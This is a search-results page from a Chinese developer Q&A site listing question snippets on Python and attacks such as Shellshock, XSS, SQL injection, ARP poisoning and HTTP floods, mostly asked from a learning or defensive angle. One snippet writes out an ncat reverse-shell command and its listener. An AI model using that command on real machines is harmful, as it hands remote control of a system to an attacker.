腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
搜索
搜索
关闭
发布
文章
问答
(9999+)
视频
沙龙
1
回答
(或者它是CVE-2014-6271/7169的可能
攻击
载体?)
、
、
、
、
根据红帽 httpd (
攻击
向量) CGI
脚本
可能受到此问题的影响:当web服务器运行CGI
脚本
时,它使用环境变量将数据传递给
脚本
。
攻击
者可以控制这些环境变量。如果CGI
脚本
调用Bash,
脚本
可以作为httpd用户执行任意代码。mod_php、mod_perl和mod_
python
不使用环境变量,我们认为它们不受影响。mod_php不容易受到CVE-2014-6271和CVE-2014-7169的
攻击
,因为它不使用环境变量。mod_f
浏览 0
提问于2014-09-25
得票数 3
回答已采纳
1
回答
HTTP洪水
攻击
检测算法
、
、
我想在
Python
脚本
上应用一个算法来检测HTTP洪水
攻击
。主要思想是将Apache日志解析为MongoDB,但我只想提取那些表示HTTP洪流
攻击
的行。有什么想法吗?
浏览 0
提问于2016-08-20
得票数 2
1
回答
如何在
python
中使用eval
、
它的核心是C++,但我使用
Python
来编写
脚本
和
攻击
/状态效果/项等。 我把自己编码到了一个角落里,在那里我必须使用eval来获得我想要的行为。每个
攻击
由任意数量的组件组成,以实现不同的行为。在这个
攻击
的例子中,我实现了一个DamageCalculatorComponent,告诉
python
使用ConstantDamage变体。我在我的
脚本
文件中实现了所有这些组件。对于我将经常使用的组件类型来说,这一切都很好。在某些
攻击
中,该<e
浏览 5
提问于2012-04-28
得票数 1
1
回答
PCAP的安全性分析
、
我对SQL注入完全陌生,我有一个标准的PCAP分析,它有如下所示的
攻击
:因此,我使用
python
脚本
分析了PCAP文件,我确信存在SQL注入
攻击
。我的疑问是,在以下情况下,这种
攻击
是如何工作的,即,或者
浏览 1
提问于2016-05-06
得票数 1
回答已采纳
1
回答
不取回
脚本
的XSS代码
、
我有一个未经验证的字段,该字段易受XSS
攻击
,到目前为止,我已经获得了下面的行,可以成功地调用我的框中的
python
服务器,该服务器承载了嵌入在html文件中的恶意
脚本
。也许我对这次
攻击
的理解是错误的,但我想我应该首先看到对html文件的调用,然后看到恶意JS的调用。 document.locat
浏览 0
提问于2018-12-30
得票数 0
回答已采纳
1
回答
用替罪羊法检测ARP中毒
、
、
、
在那里,发生了ARP中毒
攻击
。 有没有一种方法可以使用
python
脚本
中的替罪羊来检测
攻击
者的IP和MAC入口,以及受害者的IP和MAC入口?
浏览 4
提问于2013-11-30
得票数 6
回答已采纳
3
回答
python
3和相关导入的问题
、
some_library_code.py我是这样运行example_project.py的: ***\src>:
python
浏览 6
提问于2021-03-29
得票数 1
2
回答
我无法专门为
python
2安装软件包,pip和pip3指向相同的版本
、
、
、
上下文:作为我的OSCP研究的一部分,运行一个漏洞与易受
攻击
的VM的。我知道这个VM很容易受到这个漏洞的
攻击
,因为我在MSF(戊)中运行了这个漏洞,并且它成功了,但是手动执行,我遇到了依赖问题。安装程序:I on kali,最新季度发布 请记住,kali "
python
“指向
python
2.7.18,
python
3指向
python
3.xany,因为向后兼容(有趣),因为大量的漏洞都是用
python
2编写的。
脚本
使用#!/
浏览 9
提问于2021-10-17
得票数 0
回答已采纳
2
回答
如何使用ncat或netcat执行反向"Powershell“?
、
、
我使用ncat执行从一台机器到另一台机器的反向"cmd“shell,并且使用以下命令没有任何问题:In the remote machine: ncat <my ip> 443 -e cmdIn my machine: ncat -l 443
浏览 0
提问于2014-04-10
得票数 2
1
回答
我必须从
Python
3安装中删除哪些内容才能使其无法编译
脚本
、
我已经尽我所能来限制
攻击
面,但还有一个重要的漏洞。
python
脚本
仅以其编译后的形式(.pyc)存在,并且没有源代码(.py)。我怎样才能阻止别人把自己的
脚本
转换成可执行文件呢?我是否可以删除
python
的某些部分,以便它只执行预编译的
脚本
?
浏览 12
提问于2018-08-23
得票数 0
1
回答
命令语法
、
问题是,如何将其转换为bash
脚本
?也就是说,一旦我有了MITM位置,什么才是过滤和传递消息的最佳命令/算法? 编辑:似乎对我原来的帖子有误解。我的意思是,我想利用Kali Linux上的卡拉克
攻击
来黑我自己的android设备。为了更清楚地说明,我正在尝试制作自己的
攻击
脚本
,但我不确定要使用的语法/命令。因此,我想要有关bash
脚本
的参考资料/书籍,这与复制K齿克
攻击
有关,也就是说,我需要的是更多的
脚本
指导,而不是像我读到的原始论文那样的
浏览 0
提问于2018-01-29
得票数 2
2
回答
如何禁用从Jython对某些Java包的调用
、
、
用户将能够提交和执行一些
python
脚本
。我希望确保他们不会从这些
脚本
访问一些易受
攻击
的java包/类。另一种选择是完全禁用java intergation。
浏览 2
提问于2011-05-05
得票数 1
回答已采纳
3
回答
学习
Python
和通用钢笔测试中的
脚本
工具
、
我想学习Pen测试,并且已经了解Java,并且一直在学习
Python
,并且对
Python
语法相当满意。我对Linux和TCP/IP也有一些了解。我的问题是: 我如何学会用
Python
编写用于钢笔测试的工具,因为我不知道从哪里开始,目前我只使用它来解决Top的实际问题。我可以在Java中学到什么,我可以应用到钢笔测试中?
浏览 0
提问于2013-12-28
得票数 2
3
回答
伪造文件系统/虚拟文件系统
、
、
、
我有一个web服务,用户可以上传在服务器上运行的
python
脚本
。这些
脚本
处理服务器上的文件,我希望它们只能看到服务器文件系统的某个层次结构(best:一个临时文件夹,我在这个文件夹上复制我想要处理的文件和
脚本
)。我想到的是创建一个对FS文件夹具有受限访问权限的用户-最终只能访问包含
脚本
和文件的文件夹-并使用此用户启动
python
解释器。 有没有人能给我一个更好的选择?
浏览 2
提问于2010-03-16
得票数 4
回答已采纳
2
回答
如何检测其他机器的模式接口混乱?
、
、
、
、
我有一个项目,就是保护我的盒子免受中段arp毒药的
攻击
。我应该检测其他机器的接口模式是否混乱。 我必须编写
脚本
python
或命令linux。
浏览 0
提问于2015-03-19
得票数 -1
2
回答
SSH协议横幅是一种DOS?
、
在我使用
Python
脚本
在目标服务器上生成的测试环境中:只需打开/关闭足够数量的ssh连接。这是DOS对sshd的
攻击
吗?
浏览 0
提问于2017-10-16
得票数 2
3
回答
我应该在另一个可执行文件中启动
python
进程吗?
、
、
所以我有一个第三方应用程序,它公开了一个
Python
API。我有一个
python
脚本
,它可以做我需要它做的第三方应用程序。
python
脚本
只使用命令行参数,没有用户输入,并写入标准输出。由于
python
的功能如此强大,我想知道从安全的角度来看,创建一个新的可执行文件来启动
python
进程并将其命令行参数复制到
python
进程中是否有意义,该文件使用硬编码或本地读取(App.Config)
脚本
路径。这个新的可执行文件将从.NET应用
浏览 3
提问于2012-05-19
得票数 0
回答已采纳
1
回答
将
python
输出重定向到Linux中的C输入
、
、
、
我使用
python
脚本
生成超过C文件中缓冲区大小的输入。我尝试了
python
myPythonFile.py | .但是,当我在sudo:
python
myPythonFile.py | sudo ./myCFile中在相同条件下运行C文件时,程序失败(显示seg故障)。
浏览 2
提问于2022-12-03
得票数 -1
1
回答
如何通过
python
脚本
访问图像的源标签
、
、
、
我正在尝试在橙色数据挖掘中练习对抗性
攻击
,但在
python
脚本
小部件中加载映像时遇到了一些问题。我已经设置了导入图像小部件连接到
python
脚本
的位置。我对
python
很陌生,所以非常感谢具体的代码。(谢谢:)
浏览 6
提问于2022-05-17
得票数 0
点击加载更多
热门
标签
更多标签
云服务器
ICP备案
对象存储
云点播
智聆口语评测
活动推荐
运营活动
广告
关闭
领券